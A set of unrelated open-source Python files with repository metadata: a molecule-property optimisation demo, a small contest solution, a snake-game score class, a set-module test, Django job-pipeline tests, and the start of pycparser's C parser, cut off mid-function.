25184effa654599149299801de6745b7d7b11ca8 | cb56bba2bcb8fae10f738dbafacfe5d2e410e36f | /demo.py | 646de524e25703cc0d838a4ada07eb4c0357ca1a | [] | no_license | PeterEckmann1/generative-docking | 7c94a40049c8d761fea56e41bcd75e26ec1c3ef5 | 902bf3e0006087d827541c52546dd5d1e9d34f1b | refs/heads/master | 2023-07-18T04:19:16.269105 | 2021-09-07T22:29:26 | 2021-09-07T22:29:26 | 403,715,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,411 | py | import pandas as pd
import selfies as sf
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.dataset import random_split
from torch import nn
from torch import optim
import matplotlib.pyplot as plt
import torch.nn.functional as F
import os
import json
from rdkit.Chem.Crippen import MolLogP
from rdkit.Chem import MolFromSmiles
# fixes some conda issue
os.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'
class Net(nn.Module):
def __init__(self, input_len):
super(Net, self).__init__()
self.fc = nn.Sequential(nn.Linear(input_len, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 1))
def forward(self, x):
return self.fc(x)
def logp(smiles):
return MolLogP(MolFromSmiles(smiles))
def preprocess_and_save_data(file, data_dir):
df = pd.read_csv(file, sep='\t')
df['SELFIES'] = df['SMILES'].apply(sf.encoder)
vocab = list(sorted(sf.get_alphabet_from_selfies(df['SELFIES']))) + ['[nop]']
symbol_to_idx = {symbol: i for i, symbol in enumerate(vocab)}
idx_to_symbol = {i: symbol for i, symbol in enumerate(vocab)}
max_len = df['SELFIES'].apply(sf.len_selfies).max()
df['encoded'] = df['SELFIES'].apply(sf.selfies_to_encoding, args=(symbol_to_idx, max_len, 'one_hot'))
x = torch.tensor(np.vstack(df['encoded'].apply(lambda x: np.array(x).flatten())), dtype=torch.float)
df['logP'] = df['SMILES'].apply(logp)
y = torch.tensor(df['logP'], dtype=torch.float).view((-1, 1))
torch.save(x, data_dir + '/x.pt')
torch.save(y, data_dir + '/y.pt')
json.dump({'symbol_to_idx': symbol_to_idx, 'idx_to_symbol': idx_to_symbol, 'max_len': int(max_len)}, open(data_dir + '/vocab.json', 'w'))
def load_data(data_dir):
x = torch.load(data_dir + '/x.pt').to('cuda')
y = torch.load(data_dir + '/y.pt').to('cuda')
vocab = json.load(open(data_dir + '/vocab.json', 'r'))
symbol_to_idx, idx_to_symbol, max_len = vocab['symbol_to_idx'], vocab['idx_to_symbol'], vocab['max_len']
idx_to_symbol = {int(key): idx_to_symbol[key] for key in idx_to_symbol}
dataset = TensorDataset(x, y)
train_data, test_data = random_split(dataset, [int(round(len(dataset) * 0.8)), int(round(len(dataset) * 0.2))])
train_dataloader, test_dataloader = DataLoader(train_data, batch_size=10000, shuffle=True), DataLoader(test_data, batch_size=10000)
return train_dataloader, test_dataloader, symbol_to_idx, idx_to_symbol, max_len, x.mean(dim=0)
def train(model, train_dataloader, test_dataloader):
loss_f = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=0.001)
for epoch in range(30):
for x_batch, y_batch in train_dataloader:
optimizer.zero_grad()
loss = loss_f(model(x_batch), y_batch)
loss.backward()
optimizer.step()
with torch.no_grad():
total_loss = 0
for x_batch, y_batch in test_dataloader:
total_loss += loss_f(model(x_batch), y_batch).item()
torch.save(model.state_dict(), 'model.pt')
def indices_to_smiles(indices, idx_to_symbol):
selfies = ''.join([idx_to_symbol[idx] for idx in indices])
return sf.decoder(selfies)
def dream(model, starting_one_hot, target, base_props):
target_tensor = torch.tensor([[target]], dtype=torch.float).to('cuda')
old_smiles = ''
in_selfies = starting_one_hot
in_selfies += base_props * 2
#in_selfies += torch.rand(in_selfies.shape, device='cuda') * 0.95
in_selfies[in_selfies > 1] = 1
in_selfies = in_selfies.clone().detach().view((1, -1)).requires_grad_(True)
reverse_optimizer = optim.Adam([in_selfies], lr=0.1)
loss_f = nn.MSELoss()
vals = []
losses = []
for epoch in range(1000):
out = model(in_selfies)
loss = loss_f(out, target_tensor)
indices = in_selfies.detach().view((max_len, -1)).argmax(dim=1).tolist()
smiles = indices_to_smiles(indices, idx_to_symbol)
losses.append(out.item())
if smiles != old_smiles:
# print(f"New molecule: logP: {logp(smiles)}, SMILES: {smiles}")
vals.append(logp(smiles))
old_smiles = smiles
else:
vals.append(vals[-1])
reverse_optimizer.zero_grad()
loss.backward()
reverse_optimizer.step()
return old_smiles, vals
if __name__ == '__main__':
# preprocess_and_save_data('gdb11_size09.smi', 'data')
train_dataloader, test_dataloader, symbol_to_idx, idx_to_symbol, max_len, base_probs = load_data('data')
model = Net(max_len * len(symbol_to_idx)).to('cuda')
# train(model, train_dataloader, test_dataloader)
model.load_state_dict(torch.load('model.pt'))
x_batch, y_batch = next(iter(test_dataloader))
# plt.scatter(model(x_batch).detach().cpu(), y_batch.detach().cpu())
# plt.xlabel('pred')
# plt.ylabel('true')
# plt.show()
improvement_count = 0
from tqdm import tqdm
for i in tqdm(range(100)):
final_smiles, vals = dream(model, x_batch[i], -10, base_probs) #0.84 for 10, 0.89 for -10
improvement_count += int(vals[0] > vals[-1])
print(improvement_count / 100) | [
"53533143+PeterEckmann1@users.noreply.github.com"
] | 53533143+PeterEckmann1@users.noreply.github.com |
5a0689b56e34243ab30eb32f05df0bc1514a5bad | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03067/s147995985.py | b0a0627bbb6722c53ac100738e690e3079cdcbd7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | A, B, C = map(int, input().split())
if min(A, B) <= C and C <= max(A, B):
print("Yes")
else:
print("No") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c29730d6ee55732f95e7e027a60327bbf3383550 | 41893a5ea841ed882a20d94b7376790e1ce3cfac | /score.py | 6db8386ff60bea633e05969b93ac645e00a7a120 | [] | no_license | Hershey435/Feed-The-Snake | 1edd612cf3b548489b5fcc75da31e7a5c9b7d987 | 30447c178358f0864dcc6ed73609b13d19793b40 | refs/heads/main | 2023-07-19T01:23:23.334398 | 2021-09-02T04:59:07 | 2021-09-02T04:59:07 | 397,253,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | from turtle import Turtle
class Score(Turtle):
def __init__(self):
super().__init__()
self.score = 0
with open("data.txt") as f:
self.high = int(f.read())
self.color("white")
self.penup()
self.goto(0, 280)
self.update_score()
self.hideturtle()
self.goto(0, 270)
def update_score(self):
self.clear()
self.write(f"Score: {self.score} High Score: {self.high}", align="center", font=("Courier", 16, "normal"))
# def game_over(self):
# self.goto(0, 0)
# self.write("Game Over.", align="center", font=("Courier", 20, "normal"))
def reset_score(self):
if self.score > self.high:
with open("data.txt", mode="w") as f:
self.high = self.score
f.write(f"{self.high}")
self.score = 0
self.update_score()
def add_score(self):
self.score += 1
self.update_score()
| [
"noreply@github.com"
] | Hershey435.noreply@github.com |
532d89547b5dd02006bf30fab9400d191eb7d6f2 | bdcf17ed0f5c4e721416787b918048686cbea9d1 | /Day2/02_Module/simplesetTest.py | 258a56fe3c9025fa78046c9ee547c03c20122399 | [] | no_license | makemeha2/PythonEdu | 14ed10447159ae8ed411803fab441c81127b90ad | e67715e526188f2b5b7ab48d42ecec08020e426f | refs/heads/master | 2020-04-12T17:45:44.411905 | 2018-12-21T04:55:20 | 2018-12-21T04:55:20 | 162,656,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import sys
import simpleset
#sys.path.append()
print(sys.path)
setA = [1,3,7,10,13]
setB = [2,3,4,9,13]
#print(simpleset.intersect(setA, setB))
#print(simpleset.union(setA, setB))
#print(simpleset.difference(setA, setB))
print(simpleset.__intersectSC(setA, setB))
#print(dir(simpleset)) | [
"makemeha2@gmail.com"
] | makemeha2@gmail.com |
c1cc8dfadc0e15df62d780c5aba4b5aec12b5aab | 526548bbfc5629adee9c4c3865625421580f29fc | /tests/test_basic.py | 636d3d76484a9a6aaae651d92764a18138a3d122 | [
"MIT"
] | permissive | mlibrary/combine | ad8f7ed8b12d95daa770b1d20b6ba92b2531fca1 | 05a67ad30fb31d3fc13fda9c18337d5919409c14 | refs/heads/master | 2023-03-16T05:35:27.994270 | 2019-04-19T17:10:36 | 2019-04-19T17:10:36 | 182,845,536 | 1 | 0 | null | 2019-04-22T18:33:43 | 2019-04-22T18:33:43 | null | UTF-8 | Python | false | false | 11,704 | py |
import django
from lxml import etree
import os
import pytest
import shutil
import sys
import time
import uuid
# logging
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# setup django environment
# init django settings file to retrieve settings
os.environ['DJANGO_SETTINGS_MODULE'] = 'combine.settings'
sys.path.append('/opt/combine')
django.setup()
from django.conf import settings
# import core
from core.models import *
# global variables object "VO"
class Vars(object):
'''
Object to capture and store variables used across tests
'''
def __init__(self):
# combine user
self.user = User.objects.filter(username='combine').first()
VO = Vars()
#############################################################################
# Tests Setup
#############################################################################
def test_livy_start_session(use_active_livy):
'''
Test Livy session can be started
'''
# if use active livy
if use_active_livy:
VO.livy_session = LivySession.get_active_session()
VO.livy_session.refresh_from_livy()
# create livy session
else:
# start livy session
VO.livy_session = LivySession()
VO.livy_session.start_session()
# poll until session idle, limit to 60 seconds
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
VO.livy_session.refresh_from_livy()
logger.info(VO.livy_session.status)
# check status
if VO.livy_session.status != 'idle':
continue
else:
break
# assert
assert VO.livy_session.status == 'idle'
def test_organization_create():
'''
Test creation of organization
'''
# instantiate and save
VO.org = Organization(
name='test_org_%s' % uuid.uuid4().hex,
description=''
)
VO.org.save()
assert type(VO.org.id) == int
def test_record_group_create():
'''
Test creation of record group
'''
# instantiate and save
VO.rg = RecordGroup(
organization=VO.org,
name='test_record_group_%s' % uuid.uuid4().hex,
description='',
publish_set_id='test_record_group_pub_id'
)
VO.rg.save()
assert type(VO.rg.id) == int
#############################################################################
# Test Harvest
#############################################################################
def prepare_records():
'''
Unzip 250 MODS records to temp location, feed to test_static_harvest()
'''
# parse file
xml_tree = etree.parse('tests/data/mods_250.xml')
xml_root = xml_tree.getroot()
# get namespaces
nsmap = {}
for ns in xml_root.xpath('//namespace::*'):
if ns[0]:
nsmap[ns[0]] = ns[1]
# find mods records
mods_roots = xml_root.xpath('//mods:mods', namespaces=nsmap)
# create temp dir
payload_dir = '/tmp/%s' % uuid.uuid4().hex
os.makedirs(payload_dir)
# write MODS to temp dir
for mods in mods_roots:
with open(os.path.join(payload_dir, '%s.xml' % uuid.uuid4().hex), 'w') as f:
f.write(etree.tostring(mods).decode('utf-8'))
# return payload dir
return payload_dir
def test_static_harvest():
'''
Test static harvest of XML records from disk
'''
# prepare test data
payload_dir = prepare_records()
# build payload dictionary
payload_dict = {
'type':'location',
'payload_dir':payload_dir,
'xpath_document_root':'/mods:mods',
'xpath_record_id':''
}
# initiate job
cjob = HarvestStaticXMLJob(
job_name='test_static_harvest',
job_note='',
user=VO.user,
record_group=VO.rg,
index_mapper='GenericMapper',
payload_dict=payload_dict
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.static_harvest_cjob = cjob
# remove payload_dir
shutil.rmtree(payload_dir)
# assert job is done and available via livy
assert VO.static_harvest_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.static_harvest_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert no indexing failures
assert len(VO.static_harvest_cjob.get_indexing_failures()) == 0
#############################################################################
# Test Transform
#############################################################################
def prepare_transform():
'''
Create temporary transformation scenario based on tests/data/mods_transform.xsl
'''
with open('tests/data/mods_transform.xsl','r') as f:
xsl_string = f.read()
trans = Transformation(
name='temp_mods_transformation',
payload=xsl_string,
transformation_type='xslt',
filepath='will_be_updated'
)
trans.save()
# return transformation
return trans
def test_static_transform():
'''
Test static harvest of XML records from disk
'''
# prepare and capture temporary transformation scenario
VO.transformation_scenario = prepare_transform()
# initiate job
cjob = TransformJob(
job_name='test_static_transform_job',
job_note='',
user=VO.user,
record_group=VO.rg,
input_job=VO.static_harvest_cjob.job,
transformation=VO.transformation_scenario,
index_mapper='GenericMapper'
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.static_transform_cjob = cjob
# assert job is done and available via livy
assert VO.static_transform_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.static_transform_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert no indexing failures
assert len(VO.static_transform_cjob.get_indexing_failures()) == 0
# remove transformation
assert VO.transformation_scenario.delete()[0] > 0
#############################################################################
# Test Validation Scenarios
#############################################################################
def test_add_schematron_validation_scenario():
'''
Add schematron validation
'''
# get schematron validation from test data
with open('tests/data/schematron_validation.sch','r') as f:
sch_payload = f.read()
# init new validation scenario
schematron_validation_scenario = ValidationScenario(
name='temp_vs_%s' % str(uuid.uuid4()),
payload=sch_payload,
validation_type='sch',
default_run=False
)
schematron_validation_scenario.save()
# pin to VO
VO.schematron_validation_scenario = schematron_validation_scenario
# assert creation
assert type(VO.schematron_validation_scenario.id) == int
def test_add_python_validation_scenario():
'''
Add python code snippet validation
'''
# get python validation from test data
with open('tests/data/python_validation.py','r') as f:
py_payload = f.read()
# init new validation scenario
python_validation_scenario = ValidationScenario(
name='temp_vs_%s' % str(uuid.uuid4()),
payload=py_payload,
validation_type='python',
default_run=False
)
python_validation_scenario.save()
# pin to VO
VO.python_validation_scenario = python_validation_scenario
# assert creation
assert type(VO.python_validation_scenario.id) == int
def test_schematron_validation():
# get target records
VO.harvest_record = VO.static_harvest_cjob.job.get_records().first()
VO.transform_record = VO.static_transform_cjob.job.get_records().first()
# validate harvest record with schematron
'''
expecting failure count of 2
'''
vs_results = VO.schematron_validation_scenario.validate_record(VO.harvest_record)
assert vs_results['parsed']['fail_count'] == 2
# validate transform record with schematron
'''
expecting failure count of 1
'''
vs_results = VO.schematron_validation_scenario.validate_record(VO.transform_record)
assert vs_results['parsed']['fail_count'] == 1
def test_python_validation():
# validate harvest record with python
'''
expecting failure count of 1
'''
vs_results = VO.python_validation_scenario.validate_record(VO.harvest_record)
print(vs_results)
assert vs_results['parsed']['fail_count'] == 1
# validate transform record with python
'''
expecting failure count of 1
'''
vs_results = VO.python_validation_scenario.validate_record(VO.transform_record)
print(vs_results)
assert vs_results['parsed']['fail_count'] == 1
#############################################################################
# Test Duplicate/Merge Job
#############################################################################
def test_duplicate():
'''
Duplicate Transform job, applying newly created validation scenarios
'''
# initiate job
cjob = MergeJob(
job_name='test_merge_job_with_validation',
job_note='',
user=VO.user,
record_group=VO.rg,
input_jobs=[VO.static_transform_cjob.job],
index_mapper='GenericMapper',
validation_scenarios=[VO.schematron_validation_scenario.id, VO.python_validation_scenario.id]
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.merge_cjob = cjob
# assert job is done and available via livy
assert VO.merge_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.merge_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert validation scenarios applied
job_validation_scenarios = VO.merge_cjob.job.jobvalidation_set.all()
assert job_validation_scenarios.count() == 2
# loop through validation scenarios and confirm that both show 250 failures
for jv in job_validation_scenarios:
assert jv.get_record_validation_failures().count() == 250
# assert no indexing failures
assert len(VO.merge_cjob.get_indexing_failures()) == 0
#############################################################################
# Tests Teardown
#############################################################################
def test_org_delete(keep_records):
'''
Test removal of organization with cascading deletes
'''
# assert delete of org and children
if not keep_records:
assert VO.org.delete()[0] > 0
else:
assert True
def test_validation_scenario_teardown():
assert VO.schematron_validation_scenario.delete()[0] > 0
assert VO.python_validation_scenario.delete()[0] > 0
def test_livy_stop_session(use_active_livy):
'''
Test Livy session can be stopped
'''
if use_active_livy:
assert True
# stop livy session used for testing
else:
# attempt stop
VO.livy_session.stop_session()
# poll until session idle, limit to 60 seconds
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
VO.livy_session.refresh_from_livy()
logger.info(VO.livy_session.status)
# check status
if VO.livy_session.status != 'gone':
continue
else:
VO.livy_session.delete()
break
# assert
assert VO.livy_session.status == 'gone'
| [
"ghukill@gmail.com"
] | ghukill@gmail.com |
5fdfc59a41b4f23fa1d960d5d5f5f25ecc7d8e11 | 7f1b75007f5a6c633ac2b74cfb3809efc0fa6f78 | /pycparser/pycparser/c_parser.py | 1fc51cb87fa838b2037c1d2a3ecd68673a724e8a | [
"BSD-3-Clause"
] | permissive | gongmingli/C_VIZ | 1316cd04cecb364ee566f597e010f3f63f3334b1 | c35bbeb46b8dec2e5ddd52dd7775830d8a83a3ac | refs/heads/main | 2023-03-20T02:33:38.622019 | 2021-03-14T10:28:24 | 2021-03-14T10:28:24 | 347,604,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70,027 | py | #------------------------------------------------------------------------------
# pycparser: c_parser.py
#
# CParser class: Parser and AST builder for the C language
#
# Eli Bendersky [https://eli.thegreenplace.net/]
# License: BSD
#------------------------------------------------------------------------------
import re
from .ply import yacc
from . import c_ast
from .c_lexer import CLexer
from .plyparser import PLYParser, Coord, ParseError, parameterized, template
from .ast_transforms import fix_switch_cases
@template
class CParser(PLYParser):
def __init__(
self,
lex_optimize=True,
lexer=CLexer,
lextab='pycparser.lextab',
yacc_optimize=True,
yacctab='pycparser.yacctab',
yacc_debug=False,
taboutputdir=''):
""" Create a new CParser.
Some arguments for controlling the debug/optimization
level of the parser are provided. The defaults are
tuned for release/performance mode.
The simple rules for using them are:
*) When tweaking CParser/CLexer, set these to False
*) When releasing a stable parser, set to True
lex_optimize:
Set to False when you're modifying the lexer.
Otherwise, changes in the lexer won't be used, if
some lextab.py file exists.
When releasing with a stable lexer, set to True
to save the re-generation of the lexer table on
each run.
lexer:
Set this parameter to define the lexer to use if
you're not using the default CLexer.
lextab:
Points to the lex table that's used for optimized
mode. Only if you're modifying the lexer and want
some tests to avoid re-generating the table, make
this point to a local lex table file (that's been
earlier generated with lex_optimize=True)
yacc_optimize:
Set to False when you're modifying the parser.
Otherwise, changes in the parser won't be used, if
some parsetab.py file exists.
When releasing with a stable parser, set to True
to save the re-generation of the parser table on
each run.
yacctab:
Points to the yacc table that's used for optimized
mode. Only if you're modifying the parser, make
this point to a local yacc table file
yacc_debug:
Generate a parser.out file that explains how yacc
built the parsing table from the grammar.
taboutputdir:
Set this parameter to control the location of generated
lextab and yacctab files.
"""
self.clex = lexer(
error_func=self._lex_error_func,
on_lbrace_func=self._lex_on_lbrace_func,
on_rbrace_func=self._lex_on_rbrace_func,
type_lookup_func=self._lex_type_lookup_func)
self.clex.build(
optimize=lex_optimize,
lextab=lextab,
outputdir=taboutputdir)
self.tokens = self.clex.tokens
rules_with_opt = [
'abstract_declarator',
'assignment_expression',
'declaration_list',
'declaration_specifiers_no_type',
'designation',
'expression',
'identifier_list',
'init_declarator_list',
'id_init_declarator_list',
'initializer_list',
'parameter_type_list',
'block_item_list',
'type_qualifier_list',
'struct_declarator_list'
]
for rule in rules_with_opt:
self._create_opt_rule(rule)
self.cparser = yacc.yacc(
module=self,
start='translation_unit_or_empty',
debug=yacc_debug,
optimize=yacc_optimize,
tabmodule=yacctab,
outputdir=taboutputdir)
# Stack of scopes for keeping track of symbols. _scope_stack[-1] is
# the current (topmost) scope. Each scope is a dictionary that
# specifies whether a name is a type. If _scope_stack[n][name] is
# True, 'name' is currently a type in the scope. If it's False,
# 'name' is used in the scope but not as a type (for instance, if we
# saw: int name;
# If 'name' is not a key in _scope_stack[n] then 'name' was not defined
# in this scope at all.
self._scope_stack = [dict()]
# Keeps track of the last token given to yacc (the lookahead token)
self._last_yielded_token = None
def parse(self, text, filename='', debuglevel=0):
""" Parses C code and returns an AST.
text:
A string containing the C source code
filename:
Name of the file being parsed (for meaningful
error messages)
debuglevel:
Debug level to yacc
"""
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()]
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
######################-- PRIVATE --######################
def _push_scope(self):
self._scope_stack.append(dict())
def _pop_scope(self):
assert len(self._scope_stack) > 1
self._scope_stack.pop()
def _add_typedef_name(self, name, coord):
""" Add a new typedef name (ie a TYPEID) to the current scope
"""
if not self._scope_stack[-1].get(name, True):
self._parse_error(
"Typedef %r previously declared as non-typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = True
def _add_identifier(self, name, coord):
""" Add a new object, function, or enum member name (ie an ID) to the
current scope
"""
if self._scope_stack[-1].get(name, False):
self._parse_error(
"Non-typedef %r previously declared as typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = False
def _is_type_in_scope(self, name):
""" Is *name* a typedef-name in the current scope?
"""
for scope in reversed(self._scope_stack):
# If name is an identifier in this scope it shadows typedefs in
# higher scopes.
in_scope = scope.get(name)
if in_scope is not None: return in_scope
return False
def _lex_error_func(self, msg, line, column):
self._parse_error(msg, self._coord(line, column))
def _lex_on_lbrace_func(self):
self._push_scope()
def _lex_on_rbrace_func(self):
self._pop_scope()
def _lex_type_lookup_func(self, name):
""" Looks up types that were previously defined with
typedef.
Passed to the lexer for recognizing identifiers that
are types.
"""
is_type = self._is_type_in_scope(name)
return is_type
def _get_yacc_lookahead_token(self):
""" We need access to yacc's lookahead token in certain cases.
This is the last token yacc requested from the lexer, so we
ask the lexer.
"""
return self.clex.last_token
# To understand what's going on here, read sections A.8.5 and
# A.8.6 of K&R2 very carefully.
#
# A C type consists of a basic type declaration, with a list
# of modifiers. For example:
#
# int *c[5];
#
# The basic declaration here is 'int c', and the pointer and
# the array are the modifiers.
#
# Basic declarations are represented by TypeDecl (from module c_ast) and the
# modifiers are FuncDecl, PtrDecl and ArrayDecl.
#
# The standard states that whenever a new modifier is parsed, it should be
# added to the end of the list of modifiers. For example:
#
# K&R2 A.8.6.2: Array Declarators
#
# In a declaration T D where D has the form
# D1 [constant-expression-opt]
# and the type of the identifier in the declaration T D1 is
# "type-modifier T", the type of the
# identifier of D is "type-modifier array of T"
#
# This is what this method does. The declarator it receives
# can be a list of declarators ending with TypeDecl. It
# tacks the modifier to the end of this list, just before
# the TypeDecl.
#
# Additionally, the modifier may be a list itself. This is
# useful for pointers, that can come as a chain from the rule
# p_pointer. In this case, the whole modifier list is spliced
# into the new location.
def _type_modify_decl(self, decl, modifier):
""" Tacks a type modifier on a declarator, and returns
the modified declarator.
Note: the declarator and modifier may be modified
"""
#~ print '****'
#~ decl.show(offset=3)
#~ modifier.show(offset=3)
#~ print '****'
modifier_head = modifier
modifier_tail = modifier
# The modifier may be a nested list. Reach its tail.
#
while modifier_tail.type:
modifier_tail = modifier_tail.type
# If the decl is a basic type, just tack the modifier onto
# it
#
if isinstance(decl, c_ast.TypeDecl):
modifier_tail.type = decl
return modifier
else:
# Otherwise, the decl is a list of modifiers. Reach
# its tail and splice the modifier onto the tail,
# pointing to the underlying basic type.
#
decl_tail = decl
while not isinstance(decl_tail.type, c_ast.TypeDecl):
decl_tail = decl_tail.type
modifier_tail.type = decl_tail.type
decl_tail.type = modifier_head
return decl
# Due to the order in which declarators are constructed,
# they have to be fixed in order to look like a normal AST.
#
# When a declaration arrives from syntax construction, it has
# these problems:
# * The innermost TypeDecl has no type (because the basic
# type is only known at the uppermost declaration level)
# * The declaration has no variable name, since that is saved
# in the innermost TypeDecl
# * The typename of the declaration is a list of type
# specifiers, and not a node. Here, basic identifier types
# should be separated from more complex types like enums
# and structs.
#
# This method fixes these problems.
#
def _fix_decl_name_type(self, decl, typename):
""" Fixes a declaration. Modifies decl.
"""
# Reach the underlying basic type
#
type = decl
while not isinstance(type, c_ast.TypeDecl):
type = type.type
decl.name = type.declname
type.quals = decl.quals
# The typename is a list of types. If any type in this
# list isn't an IdentifierType, it must be the only
# type in the list (it's illegal to declare "int enum ..")
# If all the types are basic, they're collected in the
# IdentifierType holder.
#
for tn in typename:
if not isinstance(tn, c_ast.IdentifierType):
if len(typename) > 1:
self._parse_error(
"Invalid multiple types specified", tn.coord)
else:
type.type = tn
return decl
if not typename:
# Functions default to returning int
#
if not isinstance(decl.type, c_ast.FuncDecl):
self._parse_error(
"Missing type in declaration", decl.coord)
type.type = c_ast.IdentifierType(
['int'],
coord=decl.coord)
else:
# At this point, we know that typename is a list of IdentifierType
# nodes. Concatenate all the names into a single list.
#
type.type = c_ast.IdentifierType(
[name for id in typename for name in id.names],
coord=typename[0].coord)
return decl
def _add_declaration_specifier(self, declspec, newspec, kind, append=False):
""" Declaration specifiers are represented by a dictionary
with the entries:
* qual: a list of type qualifiers
* storage: a list of storage type qualifiers
* type: a list of type specifiers
* function: a list of function specifiers
This method is given a declaration specifier, and a
new specifier of a given kind.
If `append` is True, the new specifier is added to the end of
the specifiers list, otherwise it's added at the beginning.
Returns the declaration specifier, with the new
specifier incorporated.
"""
spec = declspec or dict(qual=[], storage=[], type=[], function=[])
if append:
spec[kind].append(newspec)
else:
spec[kind].insert(0, newspec)
return spec
def _build_declarations(self, spec, decls, typedef_namespace=False):
""" Builds a list of declarations all sharing the given specifiers.
If typedef_namespace is true, each declared name is added
to the "typedef namespace", which also includes objects,
functions, and enum constants.
"""
is_typedef = 'typedef' in spec['storage']
declarations = []
# Bit-fields are allowed to be unnamed.
#
if decls[0].get('bitsize') is not None:
pass
# When redeclaring typedef names as identifiers in inner scopes, a
# problem can occur where the identifier gets grouped into
# spec['type'], leaving decl as None. This can only occur for the
# first declarator.
#
elif decls[0]['decl'] is None:
if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \
not self._is_type_in_scope(spec['type'][-1].names[0]):
coord = '?'
for t in spec['type']:
if hasattr(t, 'coord'):
coord = t.coord
break
self._parse_error('Invalid declaration', coord)
# Make this look as if it came from "direct_declarator:ID"
decls[0]['decl'] = c_ast.TypeDecl(
declname=spec['type'][-1].names[0],
type=None,
quals=None,
coord=spec['type'][-1].coord)
# Remove the "new" type's name from the end of spec['type']
del spec['type'][-1]
# A similar problem can occur where the declaration ends up looking
# like an abstract declarator. Give it a name if this is the case.
#
elif not isinstance(decls[0]['decl'],
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
decls_0_tail = decls[0]['decl']
while not isinstance(decls_0_tail, c_ast.TypeDecl):
decls_0_tail = decls_0_tail.type
if decls_0_tail.declname is None:
decls_0_tail.declname = spec['type'][-1].names[0]
del spec['type'][-1]
for decl in decls:
assert decl['decl'] is not None
if is_typedef:
declaration = c_ast.Typedef(
name=None,
quals=spec['qual'],
storage=spec['storage'],
type=decl['decl'],
coord=decl['decl'].coord)
else:
declaration = c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=decl['decl'],
init=decl.get('init'),
bitsize=decl.get('bitsize'),
coord=decl['decl'].coord)
if isinstance(declaration.type,
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
fixed_decl = declaration
else:
fixed_decl = self._fix_decl_name_type(declaration, spec['type'])
# Add the type name defined by typedef to a
# symbol table (for usage in the lexer)
#
if typedef_namespace:
if is_typedef:
self._add_typedef_name(fixed_decl.name, fixed_decl.coord)
else:
self._add_identifier(fixed_decl.name, fixed_decl.coord)
declarations.append(fixed_decl)
return declarations
def _build_function_definition(self, spec, decl, param_decls, body):
""" Builds a function definition.
"""
assert 'typedef' not in spec['storage']
declaration = self._build_declarations(
spec=spec,
decls=[dict(decl=decl, init=None)],
typedef_namespace=True)[0]
return c_ast.FuncDef(
decl=declaration,
param_decls=param_decls,
body=body,
coord=decl.coord)
def _select_struct_union_class(self, token):
""" Given a token (either STRUCT or UNION), selects the
appropriate AST class.
"""
if token == 'struct':
return c_ast.Struct
else:
return c_ast.Union
##
## Precedence and associativity of operators
##
precedence = (
('left', 'LOR'),
('left', 'LAND'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'GT', 'GE', 'LT', 'LE'),
('left', 'RSHIFT', 'LSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD')
)
##
## Grammar productions
## Implementation of the BNF defined in K&R2 A.13
##
# Wrapper around a translation unit, to allow for empty input.
# Not strictly part of the C99 Grammar, but useful in practice.
#
def p_translation_unit_or_empty(self, p):
""" translation_unit_or_empty : translation_unit
| empty
"""
if p[1] is None:
p[0] = c_ast.FileAST([])
else:
p[0] = c_ast.FileAST(p[1])
def p_translation_unit_1(self, p):
""" translation_unit : external_declaration
"""
# Note: external_declaration is already a list
#
p[0] = p[1]
def p_translation_unit_2(self, p):
